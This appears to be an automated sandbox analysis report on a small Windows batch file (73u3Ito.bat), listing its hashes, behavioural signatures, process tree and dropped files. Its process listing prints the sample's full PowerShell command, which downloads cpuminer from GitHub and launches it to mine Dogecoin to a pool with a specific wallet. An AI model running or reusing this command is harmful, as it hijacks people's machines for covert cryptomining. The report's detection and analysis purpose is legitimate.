Analysis
-
max time kernel
146s -
max time network
132s -
platform
windows10-1703_x64 -
resource
win10-20231215-en -
resource tags
arch:x64arch:x86image:win10-20231215-enlocale:en-usos:windows10-1703-x64system -
submitted
02-02-2024 18:10
Static task
static1
Behavioral task
behavioral1
Sample
73u3Ito.bat
Resource
win10-20231215-en
General
-
Target
73u3Ito.bat
-
Size
499B
-
MD5
fe74bff27516829a88cfbc6f6e99646f
-
SHA1
0c15d859211c79910b277d07e729bec7197a60cd
-
SHA256
b1f312f139949cac20d0591831ce57c227c6ac77ebd98edfcdafa5c0b02cd2bb
-
SHA512
a94dbaef073e7b62ff9827887f1da6837103316c5656719b176ba1c2a063066f5f159b8ca783208db629121beea33fb81a94b9e6f4f4ec2612ee923639947a98
Malware Config
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 2 3908 powershell.exe 4 3908 powershell.exe -
Executes dropped EXE 1 IoCs
pid Process 3108 cpuminer-sse2.exe -
Loads dropped DLL 5 IoCs
pid Process 3108 cpuminer-sse2.exe 3108 cpuminer-sse2.exe 3108 cpuminer-sse2.exe 3108 cpuminer-sse2.exe 3108 cpuminer-sse2.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 3908 powershell.exe 3908 powershell.exe 3908 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 3908 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 5020 wrote to memory of 3908 5020 cmd.exe 61 PID 5020 wrote to memory of 3908 5020 cmd.exe 61 PID 3908 wrote to memory of 3772 3908 powershell.exe 75 PID 3908 wrote to memory of 3772 3908 powershell.exe 75 PID 3772 wrote to memory of 3108 3772 cmd.exe 77 PID 3772 wrote to memory of 3108 3772 cmd.exe 77
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\73u3Ito.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:5020 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -Command "Invoke-WebRequest -Uri 'https://github.com/JayDDee/cpuminer-opt/releases/download/v23.15/cpuminer-opt-23.15-windows.zip' -OutFile "$env:TEMP\cpuminer.zip"; Expand-Archive -Path "$env:TEMP\cpuminer.zip" -DestinationPath "$env:TEMP\cpuminer"; Set-Location -Path "$env:TEMP\cpuminer"; Start-Process -FilePath 'cmd.exe' -ArgumentList '/k', 'cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 2'"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3908 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /k cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 23⤵
- Suspicious use of WriteProcessMemory
PID:3772 -
C:\Users\Admin\AppData\Local\Temp\cpuminer\cpuminer-sse2.execpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 24⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3108
-
-
-
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
Filesize
384KB
MD5eb8ea4d2595402528f73410e2c8651ed
SHA123abb385032a9317d00c826eb21e0fe6fc802c50
SHA256fc3c5c1787c58c465ea47ab132afc59d209b1f7d319ae80a7913ed5c39157017
SHA5127f4485a662859bdec898bb4f9675c8a834ab570ae7f4df2b6e95a9f5ab45f8fba612d04f0edfe22dc4bdcd3011af0536ed200731262056cd7bec332ce4b18573
-
Filesize
2.1MB
MD527d1d615aacc511371c6349ec17f23cd
SHA1da86b0ec2ee40aa81957cd689605f89007c36883
SHA256574b4ecd441aa705b760bef41e6576172ac6340dfc7c475bbdbb434a71a5bc6f
SHA5120b7806355b5d8a179841e7fbd1845c9d8521bb2cd761e81ee119cfd9c698cf2fa15d75c3207f7418440ae8454b830cfb0ea68aa197c191aca386d2c1afc95da4
-
Filesize
102KB
MD58e0d0bfcd42c703614c11b4a84010c9a
SHA1dd9c4047137634d388f85379725113d09e80ec0a
SHA256cf82c5763516294db31cc215367abda1983d71517a73e8344f2a0e4e5e5d6f49
SHA51210e4a19c6eb96ede340c7fb13c37116863b202fd0d430f78fb641de01bafdcefbdfbf60e694cb245a9245f91efe73a27a20df9eb66c2e7746eaa19ad5c4bcc87
-
Filesize
320KB
MD5e63bf5df87e2ea807dc353cc5aa9aab1
SHA169fc94bbebe878711cb133c3a1affb80c0bdecff
SHA2562c9d6315f90367b959d3c32badd99bbc03eb808e4a46db72ccf2e81788b41533
SHA51270f2b2a8a4c8ab23d81266cd23b75c27ced29a1eab8c80d95c57b595b10254b7229cc03b637716edbfad2a83827f2c557847b98d1de80256beec05c9512ee4bd
-
Filesize
256KB
MD51d86b9560854472453237bcbaa2e253f
SHA15a03a7902d250377a3e9f746badcb696e2c98228
SHA2561493703a430c68bdcedcb4078486daca39a02820199e7b72017c7b1af66e1c8d
SHA512afbc3d7f8e06e41db25d666999f4d162af7054a66b17a651ac8a7f092f83580a067bfa2f558be65ace5966dffaa8735fe7a579e88bf42b34eaa3e72cdec96699
-
Filesize
42KB
MD561da3dda4e5628888964b1af36f949ff
SHA1ccab8f373c0a095beb3b59ffa677bac8946a5294
SHA2569f815d0e501ab587cc87083f0cd6ce3f272b4181ef110f8f4bcc52162df64f7f
SHA5129ad983ae20984ee6b46690573fbeda54071dac7ef71e01a016c4dcff68530ba21b3d7307fcd9a7ba7a53d283fa334d16647fbd5e5c3879d7540513648bfd5658
-
Filesize
836KB
MD5aeab40ed9a8e627ea7cefc1f5cf9bf7a
SHA15e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8
SHA256218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9
SHA512c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8
-
Filesize
29KB
MD512d3c481e6d2e64b88405d79aee51d07
SHA157e8867684a21889f5800005da9f802b649cf6e4
SHA256cb939ec4ec9f6a95e501550338bd3705b85cbd1db1964ea7db38edbf244838b6
SHA5125b5be46bdf5f16c32e5c6ddec07f9d9549f468f1d58a885d81e7767a6bbf0a4c59652085d5bc66d481efaf0669445afedaed26d3b6f27cbe91e525c3b9ee0b07
-
Filesize
2.0MB
MD5bf65a65f077ffc1f17eb29e07abcc08a
SHA14f500b0fc9f2ff0dd2835d6138cd05d9da74ebb1
SHA256c6a06f134f8f565208321d9246d01d937d68530343c5747a150b005133acca24
SHA512c9a14c1da78080bbda11886f9516d75bae9a5fc9d7d9b93773fa8a9fb05214e5f7d939d00ec0083fd815dcd9fc08bde431e0d35ff5d8cb8d7ce7292b4c38da8e
-
Filesize
1.6MB
MD5574dc3a49bf08fb5a7c8b8d24ebe7fbc
SHA1560b95df221911ae343c6d2ea7e7fe77f6e28ff6
SHA256e37cf4dbc4b9289e5a127b90db7ad5856a313cde28204a6a002037f27b1964d1
SHA512a9d0ba4de0147e05f086b0baac6357f3826a2f728e7f9321ff8ba88770e1a53e0ed96cbd05626bea5b3ceef554bcf2c16592b43561da70e0c6a11c96823fd915
-
Filesize
14KB
MD557bc28e77ba7f02252d5d1c6ebeb7e33
SHA103d31966e052d14ff5f92d69ceacf8fc886e003c
SHA256094b3dcb3308d87ee8c065d27dc1e0ee818c68d37312bdbc03af9c88f20914aa
SHA512c11bdf493da9bac705cf4d31330ad4bfe2e93c5aa6c0812c47906645e441981880cd651ab20b53e0e9770053d8e3b5a7acdd515ec74f6e16a8c2cdccf49229d4